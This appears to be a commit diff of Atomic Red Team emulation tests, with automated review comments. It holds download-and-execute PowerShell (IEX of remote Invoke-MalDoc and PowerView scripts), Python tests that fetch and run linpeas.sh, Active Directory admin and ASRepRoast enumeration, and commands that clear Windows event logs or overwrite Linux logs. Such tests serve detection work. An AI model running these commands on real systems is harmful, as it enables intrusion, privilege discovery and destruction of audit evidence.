if (Test-Path #{script_path}) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
@@ -68,10 +72,14 @@ Writes text to a file and display the results. This test is intended to emulate
**Supported Platforms:** Windows
**auto_generated_guid:** 127b4afe-2346-4192-815c-69042bec570e
#### Inputs:
| Name | Description | Type | Default Value |
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| file_contents_path | Path to the file that the command prompt will drop. | path | %TEMP%&#92;test.bin|
| message | Message that will be written to disk and then displayed. | string | Hello from the Windows Command Prompt!|
+9 -1
@@ -21,10 +21,14 @@ Creates and executes a simple bash script.
**Supported Platforms:** macOS, Linux
**auto_generated_guid:** 7e7ac3ed-f795-4fa5-b711-09d6fbe9b873
#### Inputs:
| Name | Description | Type | Default Value |
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| script_path | Script path | path | /tmp/art.sh|
@@ -59,6 +63,10 @@ Upon successful execution, sh will download via curl and wget the specified payl
**Supported Platforms:** macOS, Linux
**auto_generated_guid:** d0c88567-803d-4dca-99b4-7ce65e7b257c
+21 -7
@@ -25,10 +25,14 @@ When successful, system information will be written to $env:TEMP\T1059.005.out.t
**Supported Platforms:** Windows
**auto_generated_guid:** 1620de42-160a-4fe5-bbaf-d3fef0181ce9
#### Inputs:
| Name | Description | Type | Default Value |
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| vbscript | Path to sample script | String | PathToAtomicsFolder&#92;T1059.005&#92;src&#92;sys_info.vbs|
@@ -52,7 +56,7 @@ Remove-Item $env:TEMP\T1059.005.out.txt -ErrorAction Ignore
##### Description: Sample script must exist on disk at specified location (#{vbscript})
##### Check Prereq Commands:
```powershell
if (Test-Path #{vbscript}) {exit 0} else {exit 1}
if (Test-Path #{vbscript}) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
@@ -77,6 +81,10 @@ You can validate this by opening WinWord -> File -> Account -> About Word
**Supported Platforms:** Windows
**auto_generated_guid:** e8209d5f-e42d-45e6-9c2f-633ac4f1eefa
@@ -84,7 +92,8 @@ You can validate this by opening WinWord -> File -> Account -> About Word
```powershell
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing)
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1059.005\src\T1059.005-macrocode.txt" -officeProduct "Word" -sub "Exec"
```
@@ -104,7 +113,7 @@ try {
$path = $wdApp.Path
Stop-Process -Name "winword"
if ($path.contains("(x86)")) { exit 1 } else { exit 0 }
} catch { exit 1 }
} catch { exit 1 }
```
##### Get Prereq Commands:
```powershell
@@ -125,10 +134,14 @@ memory location to a file stored in the $env:TEMP\atomic_t1059_005_test_output.b
**Supported Platforms:** Windows
**auto_generated_guid:** 8faff437-a114-4547-9a60-749652a03df6
#### Inputs:
| Name | Description | Type | Default Value |
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| ms_product | Maldoc application Word | String | Word|
@@ -137,7 +150,8 @@ memory location to a file stored in the $env:TEMP\atomic_t1059_005_test_output.b
```powershell
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing)
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1059.005\src\T1059_005-macrocode.txt" -officeProduct "Word" -sub "Extract"
```
@@ -157,7 +171,7 @@ try {
$process = "#{ms_product}"; if ( $process -eq "Word") {$process = "winword"}
Stop-Process -Name $process
exit 0
} catch { exit 1 }
} catch { exit 1 }
```
##### Get Prereq Commands:
```powershell
+5 -3
@@ -54,7 +54,8 @@ atomic_tests:
Write-Host "You will need to install Microsoft Word (64-bit) manually to meet this requirement"
executor:
command: |
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing)
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1059.005\src\T1059.005-macrocode.txt" -officeProduct "Word" -sub "Exec"
cleanup_command: |
Get-WmiObject win32_process | Where-Object {$_.CommandLine -like "*mshta*"} | % { "$(Stop-Process $_.ProcessID)" } | Out-Null
@@ -88,8 +89,9 @@ atomic_tests:
Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement"
executor:
command: |
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing)
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1059.005\src\T1059_005-macrocode.txt" -officeProduct "Word" -sub "Extract"
cleanup_command: |
Remove-Item "$env:TEMP\atomic_t1059_005_test_output.bin" -ErrorAction Ignore
name: powershell
name: powershell
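Review bot: The new `IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)` line in both executor blocks still downloads and runs a helper from a moving `master` branch with no version pin or integrity check, so the test's behaviour changes silently whenever that file is edited and any tampering with the upstream file flows straight into every run. The PowerView tests in this same commit pin a full commit hash in the URL; the same could be done here, or, since the helper lives under the atomics tree this repo already ships, it could be loaded locally with something like `IEX (Get-Content "PathToAtomicsFolder\T1204.002\src\Invoke-MalDoc.ps1" -Raw)` (constructed example; confirm the checked-out path). The same unpinned fetch recurs in the T1070.001 `ClearLogs` executor section later on this page, so one fix should cover all three. The added `[Net.ServicePointManager]::SecurityProtocol` line is a reasonable companion change for hosts whose default protocol list lacks TLS 1.2.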
+18 -6
@@ -21,10 +21,14 @@ Download and execute shell script and write to file then execute locally using P
**Supported Platforms:** Linux
**auto_generated_guid:** 3a95cdb2-c6ea-4761-b24e-02b71889b8bb
#### Inputs:
| Name | Description | Type | Default Value |
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| script_url | Shell script public URL | String | https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/linPEAS/linpeas.sh|
| payload_file_name | Name of shell script downloaded from the script_url | String | T1059.006-payload|
@@ -51,7 +55,7 @@ rm #{payload_file_name}
##### Check Prereq Commands:
```sh
which_python=`which python`; python -V
$which_python -c 'import requests' 2>/dev/null; echo $?
$which_python -c 'import requests' 2>/dev/null; echo $?
```
##### Get Prereq Commands:
```sh
@@ -70,10 +74,14 @@ Create Python file (.py) that downloads and executes shell script via executor a
**Supported Platforms:** Linux
**auto_generated_guid:** 6c4d1dcb-33c7-4c36-a8df-c6cfd0408be8
#### Inputs:
| Name | Description | Type | Default Value |
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| python_script_name | Python script name | Path | T1059.006.py|
| script_url | Shell script public URL | String | https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/linPEAS/linpeas.sh|
@@ -111,7 +119,7 @@ rm #{python_script_name} #{payload_file_name}
##### Check Prereq Commands:
```sh
which_python=`which python`; python -V
$which_python -c 'import requests' 2>/dev/null; echo $?
$which_python -c 'import requests' 2>/dev/null; echo $?
```
##### Get Prereq Commands:
```sh
@@ -130,10 +138,14 @@ Create Python file (.py) then compile to binary (.pyc) that downloads an externa
**Supported Platforms:** Linux
**auto_generated_guid:** 0b44d79b-570a-4b27-a31f-3bf2156e5eaa
#### Inputs:
| Name | Description | Type | Default Value |
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| python_script_name | Name of Python script name | Path | T1059.006.py|
| script_url | URL hosting external malicious payload | String | https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/linPEAS/linpeas.sh|
@@ -173,7 +185,7 @@ rm #{python_binary_name} #{python_script_name} #{payload_file_name}
##### Check Prereq Commands:
```sh
which_python=`which python`; python -V
$which_python -c 'import requests' 2>/dev/null; echo $?
$which_python -c 'import requests' 2>/dev/null; echo $?
```
##### Get Prereq Commands:
```sh
+12
@@ -21,6 +21,10 @@ Permission Groups Discovery
**Supported Platforms:** macOS, Linux
**auto_generated_guid:** 952931a4-af0b-4335-bbbe-73c8c5b327ae
@@ -48,6 +52,10 @@ information will be displayed.
**Supported Platforms:** Windows
**auto_generated_guid:** 1f454dd6-e134-44df-bebb-67de70fb6cd8
@@ -74,6 +82,10 @@ information will be displayed.
**Supported Platforms:** Windows
**auto_generated_guid:** a580462d-2c19-4bc7-8b9a-57a41b7d3ba4
+43 -7
@@ -32,6 +32,10 @@ information will be displayed.
**Supported Platforms:** Windows
**auto_generated_guid:** dd66d77d-8998-48c0-8024-df263dc2ce5d
@@ -60,10 +64,14 @@ information will be displayed.
**Supported Platforms:** Windows
**auto_generated_guid:** 6d5d8c96-3d2a-4da9-9d6d-9a9d341899a7
#### Inputs:
| Name | Description | Type | Default Value |
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| user | User to identify what groups a user is a member of | string | administrator|
@@ -90,6 +98,10 @@ test will display some errors if run on a computer not connected to a domain. Up
**Supported Platforms:** Windows
**auto_generated_guid:** 0afb5163-8181-432e-9405-4322710c0c37
@@ -117,6 +129,10 @@ Find machines where user has local admin access (PowerView). Upon execution, pro
**Supported Platforms:** Windows
**auto_generated_guid:** a2d71eee-a353-4232-9f86-54f4288dd8c1
@@ -124,6 +140,7 @@ Find machines where user has local admin access (PowerView). Upon execution, pro
```powershell
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Find-LocalAdminAccess -Verbose
```
@@ -141,6 +158,10 @@ Enumerates members of the local Administrators groups across all machines in the
**Supported Platforms:** Windows
**auto_generated_guid:** a5f0d9f8-d3c9-46c0-8378-846ddd6b1cbd
@@ -148,6 +169,7 @@ Enumerates members of the local Administrators groups across all machines in the
```powershell
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Invoke-EnumerateLocalAdmin -Verbose
```
@@ -165,10 +187,14 @@ takes a computer and determines who has admin rights over it through GPO enumera
**Supported Platforms:** Windows
**auto_generated_guid:** 64fdb43b-5259-467a-b000-1b02c00e510a
#### Inputs:
| Name | Description | Type | Default Value |
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| computer_name | hostname of the computer to analyze | Path | $env:COMPUTERNAME|
@@ -177,7 +203,8 @@ takes a computer and determines who has admin rights over it through GPO enumera
```powershell
IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Find-GPOComputerAdmin -ComputerName #{computer_name} -Verbose
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Find-GPOComputerAdmin -ComputerName #{computer_name} -Verbose"
```
@@ -194,6 +221,10 @@ When successful, accounts that do not require kerberos pre-auth will be returned
**Supported Platforms:** Windows
**auto_generated_guid:** 870ba71e-6858-4f6d-895c-bb6237f6121b
@@ -211,7 +242,7 @@ get-aduser -f * -pr DoesNotRequirePreAuth | where {$_.DoesNotRequirePreAuth -eq
##### Description: Computer must be domain joined.
##### Check Prereq Commands:
```powershell
if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1}
if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
@@ -220,7 +251,7 @@ Write-Host Joining this computer to a domain must be done manually.
##### Description: Requires the Active Directory module for powershell to be installed.
##### Check Prereq Commands:
```powershell
if(Get-Module -ListAvailable -Name ActiveDirectory) {exit 0} else {exit 1}
if(Get-Module -ListAvailable -Name ActiveDirectory) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
@@ -240,10 +271,14 @@ reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.c
**Supported Platforms:** Windows
**auto_generated_guid:** 48ddc687-82af-40b7-8472-ff1e742e8274
#### Inputs:
| Name | Description | Type | Default Value |
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| adfind_path | Path to the AdFind executable | Path | PathToAtomicsFolder&#92;T1087.002&#92;src&#92;AdFind.exe|
@@ -262,10 +297,11 @@ reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.c
##### Description: AdFind.exe must exist on disk at specified location (#{adfind_path})
##### Check Prereq Commands:
```powershell
if (Test-Path #{adfind_path}) {exit 0} else {exit 1}
if (Test-Path #{adfind_path}) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path}
```
+6 -1
@@ -53,6 +53,7 @@ atomic_tests:
- windows
executor:
command: |
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Find-LocalAdminAccess -Verbose
name: powershell
- name: Find local admins on all machines in domain (PowerView)
@@ -63,6 +64,7 @@ atomic_tests:
- windows
executor:
command: |
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Invoke-EnumerateLocalAdmin -Verbose
name: powershell
- name: Find Local Admins via Group Policy (PowerView)
@@ -77,7 +79,9 @@ atomic_tests:
type: Path
default: $env:COMPUTERNAME
executor:
command: "IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Find-GPOComputerAdmin -ComputerName #{computer_name} -Verbose"
command: |
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Find-GPOComputerAdmin -ComputerName #{computer_name} -Verbose"
name: powershell
- name: Enumerate Users Not Requiring Pre Auth (ASRepRoast)
auto_generated_guid: 870ba71e-6858-4f6d-895c-bb6237f6121b
@@ -123,6 +127,7 @@ atomic_tests:
prereq_command: |
if (Test-Path #{adfind_path}) {exit 0} else {exit 1}
get_prereq_command: |
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path}
executor:
command: |
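Review bot: The rewritten Find-GPOComputerAdmin command in the third hunk ends with a stray `"` (`... -ComputerName #{computer_name} -Verbose"`) carried over from the old single-line quoted scalar; inside a `|` block scalar that quote is literal, so PowerShell receives an unterminated string and the test fails before PowerView is even loaded. The line should end `IEX (IWR '...PowerView.ps1' -UseBasicParsing); Find-GPOComputerAdmin -ComputerName #{computer_name} -Verbose`. The rendered markdown for the "Find Local Admins via Group Policy" test elsewhere on this page shows the same trailing quote, so it is presumably generated from this YAML and needs regenerating after the fix. The final hunk's `executor:` block continues outside the section.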
+16 -3
@@ -27,10 +27,14 @@ Upon execution this test will clear Windows Event Logs. Open the System.evtx log
**Supported Platforms:** Windows
**auto_generated_guid:** e6abb60e-26b8-41da-8aae-0c35174b0967
#### Inputs:
| Name | Description | Type | Default Value |
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| log_name | Windows Log Name, ex System | String | System|
@@ -58,6 +62,10 @@ Upon execution, open the Security.evtx logs at C:\Windows\System32\winevt\Logs a
**Supported Platforms:** Windows
**auto_generated_guid:** b13e9306-3351-4b4b-a6e8-477358b0b498
@@ -86,6 +94,10 @@ Elevation is required for this module to execute properly, otherwise WINWORD wil
**Supported Platforms:** Windows
**auto_generated_guid:** 1b682d84-f075-4f93-9a89-8a8de19ffd6e
@@ -93,7 +105,8 @@ Elevation is required for this module to execute properly, otherwise WINWORD wil
```powershell
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing)
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1070.001\src\T1070.001-macrocode.txt" -officeProduct "Word" -sub "ClearLogs"
```
@@ -108,7 +121,7 @@ try {
New-Object -COMObject "Word.Application" | Out-Null
Stop-Process -Name "winword"
exit 0
} catch { exit 1 }
} catch { exit 1 }
```
##### Get Prereq Commands:
```powershell
+3 -2
@@ -54,7 +54,8 @@ atomic_tests:
Write-Host "You will need to install Microsoft Word manually to meet this requirement"
executor:
command: |
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing)
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1070.001\src\T1070.001-macrocode.txt" -officeProduct "Word" -sub "ClearLogs"
name: powershell
elevation_required: true
elevation_required: true
+14 -2
@@ -28,6 +28,10 @@ Delete system and audit logs
**Supported Platforms:** macOS, Linux
**auto_generated_guid:** 989cc1b1-3642-4260-a809-54f9dd559683
@@ -53,10 +57,14 @@ This test overwrites the Linux mail spool of a specified user. This technique wa
**Supported Platforms:** Linux
**auto_generated_guid:** 1602ff76-ed7f-4c94-b550-2f727b4782d4
#### Inputs:
| Name | Description | Type | Default Value |
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| username | Username of mail spool | String | root|
@@ -82,10 +90,14 @@ This test overwrites the specified log. This technique was used by threat actor
**Supported Platforms:** Linux
**auto_generated_guid:** d304b2dc-90b4-4465-a650-16ddd503f7b5
#### Inputs:
| Name | Description | Type | Default Value |
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| log_path | Path of specified log | Path | /var/log/secure|
